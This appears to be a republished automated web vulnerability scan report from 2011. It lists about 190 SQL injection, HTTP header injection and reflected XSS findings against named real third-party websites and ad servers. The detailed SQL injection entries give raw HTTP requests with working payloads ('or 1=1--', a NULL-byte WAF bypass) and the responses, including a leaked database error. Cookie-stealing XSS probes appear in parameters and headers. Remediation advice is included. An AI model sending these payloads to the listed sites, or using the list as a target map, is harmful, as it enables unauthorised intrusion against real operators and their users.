XSS, DORK, Cross Site Scripting, SQL Injection, HTTP Header Injection, Response Splitting, 2-22-2011

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX Research Blog at Tue Mar 01 08:34:14 CST 2011.


1. SQL injection

1.1. http://isp.thelist.com/ [__utmb cookie]

1.2. http://segment-pixel.invitemedia.com/pixel [clientID parameter]

1.3. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

1.4. http://www.intranetjournal.com/ [__utmz cookie]

1.5. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

1.6. http://www.intranetjournal.com/ [intmintc__welcome; toURL cookie]

1.7. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

1.8. http://www.isp-planet.com/resources/directories/state_puc.html [qsg cookie]

1.9. http://www.isp-planet.com/services/merchants/index.html [intmintc__welcome cookie]

1.10. http://www.isp-planet.com/services/registrars/chart.html [qsg cookie]

1.11. http://www.isp-planet.com/services/voip_wholesalers/chart.html [__utma cookie]

1.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

1.13. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

1.14. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

1.15. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

1.16. http://www.phpbuilder.com/ [QUADIDX cookie]

2. HTTP header injection

2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

2.2. http://j.jioet.com/cgi/r [;n parameter]

2.3. http://j.jioet.com/cgi/r [InternalReferralURL parameter]

2.4. http://j.jioet.com/cgi/r [LeadSiteURL parameter]

2.5. http://j.jioet.com/cgi/r [css parameter]

2.6. http://j.jioet.com/cgi/r [ctnum parameter]

2.7. http://j.jioet.com/cgi/r [fc parameter]

2.8. http://j.jioet.com/cgi/r [ff parameter]

2.9. http://j.jioet.com/cgi/r [ft parameter]

2.10. http://j.jioet.com/cgi/r [hidepriv parameter]

2.11. http://j.jioet.com/cgi/r [name of an arbitrarily supplied request parameter]

2.12. http://j.jioet.com/cgi/r [qset parameter]

2.13. http://j.jioet.com/cgi/r [sdw parameter]

2.14. http://j.jioet.com/cgi/r [segid parameter]

2.15. http://j.jioet.com/cgi/r [sp parameter]

2.16. http://j.jioet.com/cgi/r [spage parameter]

2.17. http://j.jioet.com/cgi/r [tnum parameter]

2.18. http://j.jioet.com/cgi/r [typage parameter]

2.19. http://j.jioet.com/cgi/r [vkey parameter]

2.20. http://member.internet.com/register [REST URL parameter 1]

2.21. http://o1.qnsr.com//cgi/c [a parameter]

2.22. http://o1.qnsr.com//cgi/c [name of an arbitrarily supplied request parameter]

2.23. http://o1.qnsr.com/cgi/r [&exp parameter]

2.24. http://o1.qnsr.com/cgi/r [;n parameter]

2.25. http://o1.qnsr.com/cgi/r [CCID parameter]

2.26. http://o1.qnsr.com/cgi/r [CLK parameter]

2.27. http://o1.qnsr.com/cgi/r [QTR parameter]

2.28. http://o1.qnsr.com/cgi/r [name of an arbitrarily supplied request parameter]

2.29. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.30. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.31. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]

2.32. http://www.thelist.com/pppclicks.php [target parameter]

3. Cross-site scripting (reflected)

3.1. http://aserve.directorym.com/ModuleG.aspx [dm_affiliate parameter]

3.2. http://aserve.directorym.com/ModuleG.aspx [dm_link_url parameter]

3.3. http://aserve.directorym.com/ModuleG.aspx [dm_set_regionlist parameter]

3.4. http://flash.quantserve.com/quant.swf [lc parameter]

3.5. http://forms.vendorseek.com/controller [&CCID parameter]

3.6. http://forms.vendorseek.com/controller [&exp parameter]

3.7. http://forms.vendorseek.com/controller [CCID parameter]

3.8. http://forms.vendorseek.com/controller [CLK parameter]

3.9. http://forms.vendorseek.com/controller [InternalReferralURL parameter]

3.10. http://forms.vendorseek.com/controller [LeadSiteURL parameter]

3.11. http://forms.vendorseek.com/controller [QTR parameter]

3.12. http://forms.vendorseek.com/controller [css parameter]

3.13. http://forms.vendorseek.com/controller [ctnum parameter]

3.14. http://forms.vendorseek.com/controller [fc parameter]

3.15. http://forms.vendorseek.com/controller [ff parameter]

3.16. http://forms.vendorseek.com/controller [ft parameter]

3.17. http://forms.vendorseek.com/controller [hidepriv parameter]

3.18. http://forms.vendorseek.com/controller [name of an arbitrarily supplied request parameter]

3.19. http://forms.vendorseek.com/controller [sdw parameter]

3.20. http://forms.vendorseek.com/controller [segid parameter]

3.21. http://forms.vendorseek.com/controller [sp parameter]

3.22. http://forms.vendorseek.com/controller [spage parameter]

3.23. http://forms.vendorseek.com/controller [tnum parameter]

3.24. http://forms.vendorseek.com/controller [typage parameter]

3.25. http://forms.vendorseek.com/controller [vkey parameter]

3.26. http://image.providesupport.com/cmd/virtacore [REST URL parameter 1]

3.27. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 1]

3.28. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 2]

3.29. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpck parameter]

3.30. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpvc parameter]

3.31. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpck parameter]

3.32. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpvc parameter]

3.33. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpck parameter]

3.34. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpvc parameter]

3.35. http://intranetjournal.us.intellitxt.com/al.asp [jscallback parameter]

3.36. http://intranetjournal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.37. http://intranetjournal.us.intellitxt.com/v4/advert [jscallback parameter]

3.38. http://intranetjournal.us.intellitxt.com/v4/context [jscallback parameter]

3.39. http://intranetjournal.us.intellitxt.com/v4/init [jscallback parameter]

3.40. http://intranetjournal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.41. http://isp-planet.us.intellitxt.com/al.asp [jscallback parameter]

3.42. http://isp-planet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.43. http://isp-planet.us.intellitxt.com/v4/context [jscallback parameter]

3.44. http://isp-planet.us.intellitxt.com/v4/init [jscallback parameter]

3.45. http://isp-planet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.46. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]

3.47. http://jlinks.industrybrains.com/jsct [ct parameter]

3.48. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.49. http://jlinks.industrybrains.com/jsct [tr parameter]

3.50. http://js.revsci.net/gateway/gw.js [csid parameter]

3.51. http://kona5.kontera.com/KonaGet.js [l parameter]

3.52. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.53. http://member.internet.com/cookie_class.php [REST URL parameter 1]

3.54. http://member.internet.com/favicon.ico [REST URL parameter 1]

3.55. http://pdastreet.us.intellitxt.com/al.asp [jscallback parameter]

3.56. http://pdastreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.57. http://pdastreet.us.intellitxt.com/v4/advert [jscallback parameter]

3.58. http://pdastreet.us.intellitxt.com/v4/context [jscallback parameter]

3.59. http://pdastreet.us.intellitxt.com/v4/init [jscallback parameter]

3.60. http://pdastreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.61. http://smartphonetoday.us.intellitxt.com/al.asp [jscallback parameter]

3.62. http://smartphonetoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.63. http://smartphonetoday.us.intellitxt.com/v4/advert [jscallback parameter]

3.64. http://smartphonetoday.us.intellitxt.com/v4/context [jscallback parameter]

3.65. http://smartphonetoday.us.intellitxt.com/v4/init [jscallback parameter]

3.66. http://smartphonetoday.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.67. http://vbforums.us.intellitxt.com/al.asp [jscallback parameter]

3.68. http://vbforums.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.69. http://vbforums.us.intellitxt.com/v4/advert [jscallback parameter]

3.70. http://vbforums.us.intellitxt.com/v4/context [jscallback parameter]

3.71. http://vbforums.us.intellitxt.com/v4/init [jscallback parameter]

3.72. http://vbforums.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.73. http://virtacore.com/ [name of an arbitrarily supplied request parameter]

3.74. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

3.75. http://www.internet.com/developer [name of an arbitrarily supplied request parameter]

3.76. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

3.77. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]

3.78. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

3.79. http://www.isp-planet.com/business/associations/index.html [name of an arbitrarily supplied request parameter]

3.80. http://www.isp-planet.com/fixed_wireless/equipment/distributors/index.html [name of an arbitrarily supplied request parameter]

3.81. http://www.isp-planet.com/investor/brokers/chart.html [name of an arbitrarily supplied request parameter]

3.82. http://www.isp-planet.com/investor/brokers/index.html [name of an arbitrarily supplied request parameter]

3.83. http://www.isp-planet.com/marketing/index.html [name of an arbitrarily supplied request parameter]

3.84. http://www.isp-planet.com/quotes/index.html [name of an arbitrarily supplied request parameter]

3.85. http://www.isp-planet.com/resources/backbones/index.html [name of an arbitrarily supplied request parameter]

3.86. http://www.isp-planet.com/resources/directories/state_puc.html [name of an arbitrarily supplied request parameter]

3.87. http://www.isp-planet.com/resources/how_to/index.html [name of an arbitrarily supplied request parameter]

3.88. http://www.isp-planet.com/resources/index.html [name of an arbitrarily supplied request parameter]

3.89. http://www.isp-planet.com/resources/index_lawyer.html [name of an arbitrarily supplied request parameter]

3.90. http://www.isp-planet.com/resources/isp_guide/index.html [name of an arbitrarily supplied request parameter]

3.91. http://www.isp-planet.com/services/asguide/index.html [name of an arbitrarily supplied request parameter]

3.92. http://www.isp-planet.com/services/billing/chart.html [name of an arbitrarily supplied request parameter]

3.93. http://www.isp-planet.com/services/billing/index.html [name of an arbitrarily supplied request parameter]

3.94. http://www.isp-planet.com/services/custsupport/chart.html [name of an arbitrarily supplied request parameter]

3.95. http://www.isp-planet.com/services/custsupport/index.html [name of an arbitrarily supplied request parameter]

3.96. http://www.isp-planet.com/services/ids/chart.html [name of an arbitrarily supplied request parameter]

3.97. http://www.isp-planet.com/services/ids/index.html [name of an arbitrarily supplied request parameter]

3.98. http://www.isp-planet.com/services/merchants/index.html [name of an arbitrarily supplied request parameter]

3.99. http://www.isp-planet.com/services/registrars/chart.html [name of an arbitrarily supplied request parameter]

3.100. http://www.isp-planet.com/services/registrars/index.html [name of an arbitrarily supplied request parameter]

3.101. http://www.isp-planet.com/services/trouble_ticket/chart.html [name of an arbitrarily supplied request parameter]

3.102. http://www.isp-planet.com/services/trouble_ticket/index.html [name of an arbitrarily supplied request parameter]

3.103. http://www.isp-planet.com/services/voip_wholesalers/chart.html [name of an arbitrarily supplied request parameter]

3.104. http://www.isp-planet.com/services/voip_wholesalers/index.html [name of an arbitrarily supplied request parameter]

3.105. http://www.isp-planet.com/services/webmail/index.html [name of an arbitrarily supplied request parameter]

3.106. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]

3.107. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

3.108. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

3.109. http://www.palmblvd.com/ [e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter]

3.110. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]

3.111. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.phpbuilder.com/ [7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter]

3.113. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

3.114. http://www.phpbuilder.com/favicon.ico [REST URL parameter 1]

3.115. http://www.phpbuilder.com/welcomead/ [REST URL parameter 1]

3.116. http://www.smartphonetoday.com/ [10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter]

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]

3.118. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]

3.119. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

3.120. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]

3.121. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]

3.122. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]

3.123. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]

3.124. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]

3.125. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]

3.126. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]

3.127. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]

3.128. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]

3.129. http://www.vbforums.com/ [86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter]

3.130. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]

3.131. http://www.vibrantmedia.com/whatisIntelliTXT.asp [ipid parameter]

3.132. http://www.virtacore.com/ [name of an arbitrarily supplied request parameter]

3.133. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]

3.134. http://www.internet.com/sections/asp.html [User-Agent HTTP header]

3.135. http://www.internet.com/sections/win.html [User-Agent HTTP header]

3.136. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]

3.137. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3.138. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3.139. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.140. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.141. http://image.providesupport.com/js/virtacore/safe-monitor.js [vsid cookie]

3.142. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]

3.143. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]



1. SQL injection
There are 16 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://isp.thelist.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://isp.thelist.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 15904219'%20or%201%3d1--%20 and 15904219'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.129803325115904219'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:28 GMT
Content-Type: text/html
Content-Length: 45853

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=2960823;u=j;z=20110218074828" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=2960823;u=j;z=20110218074828" alt="Click here"></a>
</noscript>
</div>
</TD>
</tr>
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366"><a href="/index.html"><img src="/img/isp-list1.gif" width="175" height="85" border="0" alt="The List of ISPs"></a></TD>
<TD width="375" bgcolor="003366" align="center"><img src="/img/space.gif" width="375" height="2" border="0"><br><font face="helvetica, arial, verdana" size="-1" color="ffffff">Search by:<br><a href="/areacode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Area Code</font></a>&nbsp;|&nbsp;<a href="/countrycode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Country Code</font></a>&nbsp;|&nbsp;<a href="/misc/usa/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">U.S. Nationwide</font></a>&nbsp;|&nbsp;<a href="/misc/canada/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Canada Nationwide</font></a></font></td>
<TD width="200" background="/img/topright-no-search.gif" valign="top" align="center">
<img src="/img/space.gif" width="200" height="5" border="0"><br>


<!-- sitetext-1: Missing QUAD ads for page_type: index on path www.thelist.com with position S1
url: / --><span class='quad_S1'></div>

<br>
   <font face="helvetica, arial, verdana" size="-2" color="ffffff"><b>Search: </b></font>
   <INPUT TYPE="HIDDEN" name="IC_StartNumber" value="0">
   <INPUT TYPE="HIDDEN" name="IC_BatchSize" value="10">
   <INPUT TYPE="HIDDEN" name="IC_RelevanceThreshold" value="50">
   <INPUT TYPE="HIDDEN" NAME="IC_QueryDatabase" VALUE="TheList">
   <INPUT TYPE="text" NAME="IC_QueryText" SIZE="10">
   <input type="image" name="Submit" value="Find" src="http://isps.thelist.com/img/findbuttonred.gif" ALIGN="ABSMIDDLE"
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.129803325115904219'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:26 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:26 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=1230773098;u=j;z=20110218074826" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=1230773098;u=j;z=20110218074826" alt="Click here"></a>
</noscript>
</div>
</TD>
</tr>
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366"><a href="/index.html"><img src="/img/isp-list1.gif" width="175" height="85" border="0" alt="The List of ISPs"></a></TD>
<TD width="375" bgcolor="003366" align="center"><img src="/img/space.gif" width="375" height="2" border="0"><br><font face="helvetica, arial, verdana" size="-1" color="ffffff">Search by:<br><a href="/areacode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Area Code</font></a>&nbsp;|&nbsp;<a href="/countrycode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Country Code</font></a>&nbsp;|&nbsp;<a href="/misc/usa/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">U.S. Nationwide</font></a>&nbsp;|&nbsp;<a href="/misc/canada/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Canada Nationwide</font></a></font></td>
<TD width="200" background="/img/topright-no-search.gif" valign="top" align="center">
<img src="/img/space.gif" width="200" height="5" border="0"><br>


<!-- sitetext-1: Missing QUAD ads for page_type: index on path www.thelist.com with position S1
url: / --><span class='quad_S1'></div>

<br>
   <font face="helvetica, arial, verdana" size="-2" color="ffffff"><b>Search: </b></font>
   <INPUT TYPE="HIDDEN" name="IC_StartNumber" value="0">
   <INPUT TYPE="HIDDEN" name="IC_BatchSize" value="10">
   <INPUT TYPE="HIDDEN" name="IC_RelevanceThreshold" value="50">
   <INPUT TYPE="HIDDEN" NAME="IC_QueryDatabase" VALUE="TheList">
   <INPUT TYPE="text" NAME="IC_QueryText" SIZE="10">
   <input type="image" name="Submit" value="Find" src="http://isps.thelist.com/img/findbuttonred.gif" ALIGN="ABSM
...[SNIP]...

1.2. http://segment-pixel.invitemedia.com/pixel [clientID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The clientID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the clientID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00'&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00''&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="

Response 2

HTTP/1.0 302 Found
Server: IM BidManager
Date: Fri, 18 Feb 2011 16:55:10 GMT
Expires: Fri, 18-Feb-2011 16:54:50 GMT
Location: http://ad.yieldmanager.com/pixel?id=1172643&t=2
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain
Set-Cookie: segments_p1=eJzjYuY4ycHFwvHyICOQbN3LyMXM8Y+Di4vj4zYmgcuzrr5mAQCN0woi; Domain=invitemedia.com; expires=Sat, 18-Feb-2012 16:55:10 GMT; Path=/


1.3. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://virtacore.com
Path:   /vcloud_express.cfm

Issue detail

The rxtype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rxtype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /vcloud_express.cfm?rxtype=15:2:0:leftcontent;billboard;other_content;'&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   {history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=15
...[SNIP]...
<td>\r\n\t\t\t\t\tjava.sql.SQLException: [Macromedia][SQLServer JDBC Driver]Invalid parameter binding(s).\n\tat macromedia.jdbc.base.BaseExceptions.createException(Unknown Source)\n\tat macromedia.jdbc.base.BaseExceptions.getException(Unkno
...[SNIP]...

Request 2

GET /vcloud_express.cfm?rxtype=15:2:0:leftcontent;billboard;other_content;''&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

